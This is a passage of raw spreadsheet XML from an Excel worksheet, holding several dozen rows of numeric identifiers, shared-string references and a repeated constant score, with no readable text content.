      <c r="E29423" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29423" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29424" ht="15.75" customHeight="1">
      <c r="A29424" s="1">
        <v>7273.0</v>
      </c>
      <c r="B29424" s="2">
        <v>5.0786364E7</v>
      </c>
      <c r="C29424" s="2" t="s">
        <v>28288</v>
      </c>
      <c r="D29424" s="2">
        <v>1.0</v>
      </c>
      <c r="E29424" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29424" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29425" ht="15.75" customHeight="1">
      <c r="A29425" s="1">
        <v>7579.0</v>
      </c>
      <c r="B29425" s="2">
        <v>5.1592497E7</v>
      </c>
      <c r="C29425" s="2" t="s">
        <v>28289</v>
      </c>
      <c r="D29425" s="2">
        <v>1.0</v>
      </c>
      <c r="E29425" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29425" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29426" ht="15.75" customHeight="1">
      <c r="A29426" s="1">
        <v>7759.0</v>
      </c>
      <c r="B29426" s="2">
        <v>5.210177E7</v>
      </c>
      <c r="C29426" s="2" t="s">
        <v>28290</v>
      </c>
      <c r="D29426" s="2">
        <v>1.0</v>
      </c>
      <c r="E29426" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29426" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29427" ht="15.75" customHeight="1">
      <c r="A29427" s="1">
        <v>8158.0</v>
      </c>
      <c r="B29427" s="2">
        <v>5.3190455E7</v>
      </c>
      <c r="C29427" s="2" t="s">
        <v>28291</v>
      </c>
      <c r="D29427" s="2">
        <v>1.0</v>
      </c>
      <c r="E29427" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29427" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29428" ht="15.75" customHeight="1">
      <c r="A29428" s="1">
        <v>8225.0</v>
      </c>
      <c r="B29428" s="2">
        <v>5.3350333E7</v>
      </c>
      <c r="C29428" s="2" t="s">
        <v>28292</v>
      </c>
      <c r="D29428" s="2">
        <v>1.0</v>
      </c>
      <c r="E29428" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29428" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29429" ht="15.75" customHeight="1">
      <c r="A29429" s="1">
        <v>8987.0</v>
      </c>
      <c r="B29429" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C29429" s="2" t="s">
        <v>28293</v>
      </c>
      <c r="D29429" s="2">
        <v>1.0</v>
      </c>
      <c r="E29429" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29429" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29430" ht="15.75" customHeight="1">
      <c r="A29430" s="1">
        <v>10089.0</v>
      </c>
      <c r="B29430" s="2">
        <v>5.7173208E7</v>
      </c>
      <c r="C29430" s="2" t="s">
        <v>28294</v>
      </c>
      <c r="D29430" s="2">
        <v>1.0</v>
      </c>
      <c r="E29430" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29430" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29431" ht="15.75" customHeight="1">
      <c r="A29431" s="1">
        <v>10371.0</v>
      </c>
      <c r="B29431" s="2">
        <v>7946244.0</v>
      </c>
      <c r="C29431" s="2" t="s">
        <v>28295</v>
      </c>
      <c r="D29431" s="2">
        <v>1.0</v>
      </c>
      <c r="E29431" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29431" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29432" ht="15.75" customHeight="1">
      <c r="A29432" s="1">
        <v>10843.0</v>
      </c>
      <c r="B29432" s="2">
        <v>1.6084687E7</v>
      </c>
      <c r="C29432" s="2" t="s">
        <v>28296</v>
      </c>
      <c r="D29432" s="2">
        <v>1.0</v>
      </c>
      <c r="E29432" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29432" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29433" ht="15.75" customHeight="1">
      <c r="A29433" s="1">
        <v>11026.0</v>
      </c>
      <c r="B29433" s="2">
        <v>1.7886424E7</v>
      </c>
      <c r="C29433" s="2" t="s">
        <v>28297</v>
      </c>
      <c r="D29433" s="2">
        <v>1.0</v>
      </c>
      <c r="E29433" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29433" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29434" ht="15.75" customHeight="1">
      <c r="A29434" s="1">
        <v>11333.0</v>
      </c>
      <c r="B29434" s="2">
        <v>2.1185965E7</v>
      </c>
      <c r="C29434" s="2" t="s">
        <v>28298</v>
      </c>
      <c r="D29434" s="2">
        <v>1.0</v>
      </c>
      <c r="E29434" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29434" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29435" ht="15.75" customHeight="1">
      <c r="A29435" s="1">
        <v>11473.0</v>
      </c>
      <c r="B29435" s="2">
        <v>2.1959077E7</v>
      </c>
      <c r="C29435" s="2" t="s">
        <v>28299</v>
      </c>
      <c r="D29435" s="2">
        <v>1.0</v>
      </c>
      <c r="E29435" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29435" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29436" ht="15.75" customHeight="1">
      <c r="A29436" s="1">
        <v>11564.0</v>
      </c>
      <c r="B29436" s="2">
        <v>2.274843E7</v>
      </c>
      <c r="C29436" s="2" t="s">
        <v>28300</v>
      </c>
      <c r="D29436" s="2">
        <v>1.0</v>
      </c>
      <c r="E29436" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29436" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29437" ht="15.75" customHeight="1">
      <c r="A29437" s="1">
        <v>12336.0</v>
      </c>
      <c r="B29437" s="2">
        <v>2.8583696E7</v>
      </c>
      <c r="C29437" s="2" t="s">
        <v>28301</v>
      </c>
      <c r="D29437" s="2">
        <v>1.0</v>
      </c>
      <c r="E29437" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29437" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29438" ht="15.75" customHeight="1">
      <c r="A29438" s="1">
        <v>12348.0</v>
      </c>
      <c r="B29438" s="2">
        <v>2.8658055E7</v>
      </c>
      <c r="C29438" s="2" t="s">
        <v>28302</v>
      </c>
      <c r="D29438" s="2">
        <v>1.0</v>
      </c>
      <c r="E29438" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29438" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29439" ht="15.75" customHeight="1">
      <c r="A29439" s="1">
        <v>13061.0</v>
      </c>
      <c r="B29439" s="2">
        <v>3.3249202E7</v>
      </c>
      <c r="C29439" s="2" t="s">
        <v>28303</v>
      </c>
      <c r="D29439" s="2">
        <v>1.0</v>
      </c>
      <c r="E29439" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29439" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29440" ht="15.75" customHeight="1">
      <c r="A29440" s="1">
        <v>13136.0</v>
      </c>
      <c r="B29440" s="2">
        <v>3.3711527E7</v>
      </c>
      <c r="C29440" s="2" t="s">
        <v>28304</v>
      </c>
      <c r="D29440" s="2">
        <v>1.0</v>
      </c>
      <c r="E29440" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29440" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29441" ht="15.75" customHeight="1">
      <c r="A29441" s="1">
        <v>13209.0</v>
      </c>
      <c r="B29441" s="2">
        <v>3.4156007E7</v>
      </c>
      <c r="C29441" s="2" t="s">
        <v>28305</v>
      </c>
      <c r="D29441" s="2">
        <v>1.0</v>
      </c>
      <c r="E29441" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29441" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29442" ht="15.75" customHeight="1">
      <c r="A29442" s="1">
        <v>13317.0</v>
      </c>
      <c r="B29442" s="2">
        <v>3.4577704E7</v>
      </c>
      <c r="C29442" s="2" t="s">
        <v>28306</v>
      </c>
      <c r="D29442" s="2">
        <v>1.0</v>
      </c>
      <c r="E29442" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29442" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29443" ht="15.75" customHeight="1">
      <c r="A29443" s="1">
        <v>13634.0</v>
      </c>
      <c r="B29443" s="2">
        <v>3.5909363E7</v>
      </c>
      <c r="C29443" s="2" t="s">
        <v>28307</v>
      </c>
      <c r="D29443" s="2">
        <v>1.0</v>
      </c>
      <c r="E29443" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29443" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29444" ht="15.75" customHeight="1">
      <c r="A29444" s="1">
        <v>13965.0</v>
      </c>
      <c r="B29444" s="2">
        <v>3.7312502E7</v>
      </c>
      <c r="C29444" s="2" t="s">
        <v>28308</v>
      </c>
      <c r="D29444" s="2">
        <v>1.0</v>
      </c>
      <c r="E29444" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29444" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29445" ht="15.75" customHeight="1">
      <c r="A29445" s="1">
        <v>14599.0</v>
      </c>
      <c r="B29445" s="2">
        <v>4.0237307E7</v>
      </c>
      <c r="C29445" s="2" t="s">
        <v>28309</v>
      </c>
      <c r="D29445" s="2">
        <v>1.0</v>
      </c>
      <c r="E29445" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29445" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29446" ht="15.75" customHeight="1">
      <c r="A29446" s="1">
        <v>14650.0</v>
      </c>
      <c r="B29446" s="2">
        <v>4.0389059E7</v>
      </c>
      <c r="C29446" s="2" t="s">
        <v>28310</v>
      </c>
      <c r="D29446" s="2">
        <v>1.0</v>
      </c>
      <c r="E29446" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29446" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29447" ht="15.75" customHeight="1">
      <c r="A29447" s="1">
        <v>15008.0</v>
      </c>
      <c r="B29447" s="2">
        <v>4.1466355E7</v>
      </c>
      <c r="C29447" s="2" t="s">
        <v>28311</v>
      </c>
      <c r="D29447" s="2">
        <v>1.0</v>
      </c>
      <c r="E29447" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29447" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29448" ht="15.75" customHeight="1">
      <c r="A29448" s="1">
        <v>15034.0</v>
      </c>
      <c r="B29448" s="2">
        <v>4.1561955E7</v>
      </c>
      <c r="C29448" s="2" t="s">
        <v>28312</v>
      </c>
      <c r="D29448" s="2">
        <v>1.0</v>
      </c>
      <c r="E29448" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29448" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29449" ht="15.75" customHeight="1">
      <c r="A29449" s="1">
        <v>15789.0</v>
      </c>
      <c r="B29449" s="2">
        <v>4.4208931E7</v>
      </c>
      <c r="C29449" s="2" t="s">
        <v>28313</v>
      </c>
      <c r="D29449" s="2">
        <v>1.0</v>
      </c>
      <c r="E29449" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29449" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29450" ht="15.75" customHeight="1">
      <c r="A29450" s="1">
        <v>15811.0</v>
      </c>
      <c r="B29450" s="2">
        <v>4.4249778E7</v>
      </c>
      <c r="C29450" s="2" t="s">
        <v>28314</v>
      </c>
      <c r="D29450" s="2">
        <v>1.0</v>
      </c>
      <c r="E29450" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29450" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29451" ht="15.75" customHeight="1">
      <c r="A29451" s="1">
        <v>17839.0</v>
      </c>
      <c r="B29451" s="2">
        <v>5.0931819E7</v>
      </c>
      <c r="C29451" s="2" t="s">
        <v>28315</v>
      </c>
      <c r="D29451" s="2">
        <v>1.0</v>
      </c>
      <c r="E29451" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29451" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29452" ht="15.75" customHeight="1">
      <c r="A29452" s="1">
        <v>18358.0</v>
      </c>
      <c r="B29452" s="2">
        <v>5.2535654E7</v>
      </c>
      <c r="C29452" s="2" t="s">
        <v>28316</v>
      </c>
      <c r="D29452" s="2">
        <v>1.0</v>
      </c>
      <c r="E29452" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29452" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29453" ht="15.75" customHeight="1">
      <c r="A29453" s="1">
        <v>18822.0</v>
      </c>
      <c r="B29453" s="2">
        <v>5.3927896E7</v>
      </c>
      <c r="C29453" s="2" t="s">
        <v>28317</v>
      </c>
      <c r="D29453" s="2">
        <v>1.0</v>
      </c>
      <c r="E29453" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29453" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29454" ht="15.75" customHeight="1">
      <c r="A29454" s="1">
        <v>19150.0</v>
      </c>
      <c r="B29454" s="2">
        <v>5.4847444E7</v>
      </c>
      <c r="C29454" s="2" t="s">
        <v>28318</v>
      </c>
      <c r="D29454" s="2">
        <v>1.0</v>
      </c>
      <c r="E29454" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29454" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29455" ht="15.75" customHeight="1">
      <c r="A29455" s="1">
        <v>19429.0</v>
      </c>
      <c r="B29455" s="2">
        <v>5.5683183E7</v>
      </c>
      <c r="C29455" s="2" t="s">
        <v>28319</v>
      </c>
      <c r="D29455" s="2">
        <v>1.0</v>
      </c>
      <c r="E29455" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29455" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29456" ht="15.75" customHeight="1">
      <c r="A29456" s="1">
        <v>19440.0</v>
      </c>
      <c r="B29456" s="2">
        <v>5.5706209E7</v>
      </c>
      <c r="C29456" s="2" t="s">
        <v>28320</v>
      </c>
      <c r="D29456" s="2">
        <v>1.0</v>
      </c>
      <c r="E29456" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29456" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29457" ht="15.75" customHeight="1">
      <c r="A29457" s="1">
        <v>19617.0</v>
      </c>
      <c r="B29457" s="2">
        <v>5.6215272E7</v>
      </c>
      <c r="C29457" s="2" t="s">
        <v>28321</v>
      </c>
      <c r="D29457" s="2">
        <v>1.0</v>
      </c>
      <c r="E29457" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29457" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29458" ht="15.75" customHeight="1">
      <c r="A29458" s="1">
        <v>20713.0</v>
      </c>
      <c r="B29458" s="2">
        <v>1.4600583E7</v>
      </c>
      <c r="C29458" s="2" t="s">
        <v>28322</v>
      </c>
      <c r="D29458" s="2">
        <v>1.0</v>
      </c>
      <c r="E29458" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29458" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29459" ht="15.75" customHeight="1">
      <c r="A29459" s="1">
        <v>21372.0</v>
      </c>
      <c r="B29459" s="2">
        <v>2.1575166E7</v>
      </c>
      <c r="C29459" s="2" t="s">
        <v>28323</v>
      </c>
      <c r="D29459" s="2">
        <v>1.0</v>
      </c>
      <c r="E29459" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29459" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29460" ht="15.75" customHeight="1">
      <c r="A29460" s="1">
        <v>21945.0</v>
      </c>
      <c r="B29460" s="2">
        <v>2.8770691E7</v>
      </c>
      <c r="C29460" s="2" t="s">
        <v>28324</v>
      </c>
      <c r="D29460" s="2">
        <v>1.0</v>
      </c>
      <c r="E29460" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29460" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29461" ht="15.75" customHeight="1">
      <c r="A29461" s="1">
        <v>21997.0</v>
      </c>
      <c r="B29461" s="2">
        <v>2.9547357E7</v>
      </c>
      <c r="C29461" s="2" t="s">
        <v>28325</v>
      </c>
      <c r="D29461" s="2">
        <v>1.0</v>
      </c>
      <c r="E29461" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29461" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29462" ht="15.75" customHeight="1">
      <c r="A29462" s="1">
        <v>22277.0</v>
      </c>
      <c r="B29462" s="2">
        <v>3.3265757E7</v>
      </c>
      <c r="C29462" s="2" t="s">
        <v>28326</v>
      </c>
      <c r="D29462" s="2">
        <v>1.0</v>
      </c>
      <c r="E29462" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29462" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29463" ht="15.75" customHeight="1">
      <c r="A29463" s="1">
        <v>22278.0</v>
      </c>
      <c r="B29463" s="2">
        <v>3.3294413E7</v>
      </c>
      <c r="C29463" s="2" t="s">
        <v>28327</v>
      </c>
      <c r="D29463" s="2">
        <v>1.0</v>
      </c>
      <c r="E29463" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29463" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29464" ht="15.75" customHeight="1">
      <c r="A29464" s="1">
        <v>22836.0</v>
      </c>
      <c r="B29464" s="2">
        <v>4.6525289E7</v>
      </c>
      <c r="C29464" s="2" t="s">
        <v>28328</v>
      </c>
      <c r="D29464" s="2">
        <v>1.0</v>
      </c>
      <c r="E29464" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29464" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29465" ht="15.75" customHeight="1">
      <c r="A29465" s="1">
        <v>22891.0</v>
      </c>
      <c r="B29465" s="2">
        <v>4.7851063E7</v>
      </c>
      <c r="C29465" s="2" t="s">
        <v>28329</v>
      </c>
      <c r="D29465" s="2">
        <v>1.0</v>
      </c>
      <c r="E29465" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29465" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29466" ht="15.75" customHeight="1">
      <c r="A29466" s="1">
        <v>23406.0</v>
      </c>
      <c r="B29466" s="2">
        <v>5.5939908E7</v>
      </c>
      <c r="C29466" s="2" t="s">
        <v>28330</v>
      </c>
      <c r="D29466" s="2">
        <v>1.0</v>
      </c>
      <c r="E29466" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29466" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29467" ht="15.75" customHeight="1">
      <c r="A29467" s="1">
        <v>23600.0</v>
      </c>
      <c r="B29467" s="2">
        <v>6395461.0</v>
      </c>
      <c r="C29467" s="2" t="s">
        <v>28331</v>
      </c>
      <c r="D29467" s="2">
        <v>1.0</v>
      </c>
      <c r="E29467" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29467" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29468" ht="15.75" customHeight="1">
      <c r="A29468" s="1">
        <v>24344.0</v>
      </c>
      <c r="B29468" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C29468" s="2" t="s">
        <v>28332</v>
      </c>
      <c r="D29468" s="2">
        <v>1.0</v>
      </c>
      <c r="E29468" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29468" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29469" ht="15.75" customHeight="1">
      <c r="A29469" s="1">
        <v>24523.0</v>
      </c>
      <c r="B29469" s="2">
        <v>1.1164489E7</v>
      </c>
      <c r="C29469" s="2" t="s">
        <v>28333</v>
      </c>
      <c r="D29469" s="2">
        <v>1.0</v>
      </c>
      <c r="E29469" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29469" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29470" ht="15.75" customHeight="1">
      <c r="A29470" s="1">
        <v>24655.0</v>
      </c>
      <c r="B29470" s="2">
        <v>1.1512449E7</v>
      </c>
      <c r="C29470" s="2" t="s">
        <v>28334</v>
      </c>
      <c r="D29470" s="2">
        <v>1.0</v>
      </c>
      <c r="E29470" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29470" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29471" ht="15.75" customHeight="1">
      <c r="A29471" s="1">
        <v>25117.0</v>
      </c>
      <c r="B29471" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C29471" s="2" t="s">
        <v>28335</v>
      </c>
      <c r="D29471" s="2">
        <v>1.0</v>
      </c>
      <c r="E29471" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29471" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29472" ht="15.75" customHeight="1">
      <c r="A29472" s="1">
        <v>25213.0</v>
      </c>
      <c r="B29472" s="2">
        <v>1.3228293E7</v>
      </c>
      <c r="C29472" s="2" t="s">
        <v>28336</v>
      </c>
      <c r="D29472" s="2">
        <v>1.0</v>
      </c>
      <c r="E29472" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29472" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29473" ht="15.75" customHeight="1">
      <c r="A29473" s="1">
        <v>25752.0</v>
      </c>
      <c r="B29473" s="2">
        <v>1.4600582E7</v>
      </c>
      <c r="C29473" s="2" t="s">
        <v>28322</v>
      </c>
      <c r="D29473" s="2">
        <v>1.0</v>
      </c>
      <c r="E29473" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29473" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29474" ht="15.75" customHeight="1">
      <c r="A29474" s="1">
        <v>26454.0</v>
      </c>
      <c r="B29474" s="2">
        <v>1.731204E7</v>
      </c>
      <c r="C29474" s="2" t="s">
        <v>28337</v>
      </c>
      <c r="D29474" s="2">
        <v>1.0</v>
      </c>
      <c r="E29474" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29474" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29475" ht="15.75" customHeight="1">
      <c r="A29475" s="1">
        <v>26524.0</v>
      </c>
      <c r="B29475" s="2">
        <v>1.7683769E7</v>
      </c>
      <c r="C29475" s="2" t="s">
        <v>28338</v>
      </c>
      <c r="D29475" s="2">
        <v>1.0</v>
      </c>
      <c r="E29475" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29475" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29476" ht="15.75" customHeight="1">
      <c r="A29476" s="1">
        <v>26616.0</v>
      </c>
      <c r="B29476" s="2">
        <v>1.8020491E7</v>
      </c>
      <c r="C29476" s="2" t="s">
        <v>28339</v>
      </c>
      <c r="D29476" s="2">
        <v>1.0</v>
      </c>
      <c r="E29476" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29476" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29477" ht="15.75" customHeight="1">
      <c r="A29477" s="1">
        <v>26743.0</v>
      </c>
      <c r="B29477" s="2">
        <v>1.8297931E7</v>
      </c>
      <c r="C29477" s="2" t="s">
        <v>28340</v>
      </c>
      <c r="D29477" s="2">
        <v>1.0</v>
      </c>
      <c r="E29477" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29477" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29478" ht="15.75" customHeight="1">
      <c r="A29478" s="1">
        <v>28053.0</v>
      </c>
      <c r="B29478" s="2">
        <v>2.4571331E7</v>
      </c>
      <c r="C29478" s="2" t="s">
        <v>28341</v>
      </c>
      <c r="D29478" s="2">
        <v>1.0</v>
      </c>
      <c r="E29478" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29478" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29479" ht="15.75" customHeight="1">
      <c r="A29479" s="1">
        <v>28322.0</v>
      </c>
      <c r="B29479" s="2">
        <v>2.5805647E7</v>
      </c>
      <c r="C29479" s="2" t="s">
        <v>28342</v>
      </c>
      <c r="D29479" s="2">
        <v>1.0</v>
      </c>
      <c r="E29479" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29479" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29480" ht="15.75" customHeight="1">
      <c r="A29480" s="1">
        <v>28329.0</v>
      </c>
      <c r="B29480" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C29480" s="2" t="s">
        <v>28343</v>
      </c>
      <c r="D29480" s="2">
        <v>1.0</v>
      </c>
      <c r="E29480" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29480" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29481" ht="15.75" customHeight="1">
      <c r="A29481" s="1">
        <v>28816.0</v>
      </c>
      <c r="B29481" s="2">
        <v>2.877069E7</v>
      </c>
      <c r="C29481" s="2" t="s">
        <v>28324</v>
      </c>
      <c r="D29481" s="2">
        <v>1.0</v>
      </c>
      <c r="E29481" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29481" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29482" ht="15.75" customHeight="1">
      <c r="A29482" s="1">
        <v>28945.0</v>
      </c>
      <c r="B29482" s="2">
        <v>2.9693783E7</v>
      </c>
      <c r="C29482" s="2" t="s">
        <v>28344</v>
      </c>
      <c r="D29482" s="2">
        <v>1.0</v>
      </c>
      <c r="E29482" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29482" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29483" ht="15.75" customHeight="1">
      <c r="A29483" s="1">
        <v>29683.0</v>
      </c>
      <c r="B29483" s="2">
        <v>3.4059586E7</v>
      </c>
      <c r="C29483" s="2" t="s">
        <v>28345</v>
      </c>
      <c r="D29483" s="2">
        <v>1.0</v>
      </c>
      <c r="E29483" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29483" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29484" ht="15.75" customHeight="1">
      <c r="A29484" s="1">
        <v>29711.0</v>
      </c>
      <c r="B29484" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C29484" s="2" t="s">
        <v>28346</v>
      </c>
      <c r="D29484" s="2">
        <v>1.0</v>
      </c>
      <c r="E29484" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29484" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29485" ht="15.75" customHeight="1">
      <c r="A29485" s="1">
        <v>31041.0</v>
      </c>
      <c r="B29485" s="2">
        <v>4.7851062E7</v>
      </c>
      <c r="C29485" s="2" t="s">
        <v>28329</v>
      </c>
      <c r="D29485" s="2">
        <v>1.0</v>
      </c>
      <c r="E29485" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29485" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29486" ht="15.75" customHeight="1">
      <c r="A29486" s="1">
        <v>31563.0</v>
      </c>
      <c r="B29486" s="2">
        <v>5121429.0</v>
      </c>
      <c r="C29486" s="2" t="s">
        <v>28347</v>
      </c>
      <c r="D29486" s="2">
        <v>1.0</v>
      </c>
      <c r="E29486" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29486" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29487" ht="15.75" customHeight="1">
      <c r="A29487" s="1">
        <v>31822.0</v>
      </c>
      <c r="B29487" s="2">
        <v>5253618.0</v>
      </c>
      <c r="C29487" s="2" t="s">
        <v>28348</v>
      </c>
      <c r="D29487" s="2">
        <v>1.0</v>
      </c>
      <c r="E29487" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29487" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29488" ht="15.75" customHeight="1">
      <c r="A29488" s="1">
        <v>32091.0</v>
      </c>
      <c r="B29488" s="2">
        <v>5399211.0</v>
      </c>
      <c r="C29488" s="2" t="s">
        <v>28349</v>
      </c>
      <c r="D29488" s="2">
        <v>1.0</v>
      </c>
      <c r="E29488" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29488" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29489" ht="15.75" customHeight="1">
      <c r="A29489" s="1">
        <v>32761.0</v>
      </c>
      <c r="B29489" s="2">
        <v>6069505.0</v>
      </c>
      <c r="C29489" s="2" t="s">
        <v>24221</v>
      </c>
      <c r="D29489" s="2">
        <v>1.0</v>
      </c>
      <c r="E29489" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29489" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29490" ht="15.75" customHeight="1">
      <c r="A29490" s="1">
        <v>32844.0</v>
      </c>
      <c r="B29490" s="2">
        <v>6252743.0</v>
      </c>
      <c r="C29490" s="2" t="s">
        <v>28350</v>
      </c>
      <c r="D29490" s="2">
        <v>1.0</v>
      </c>
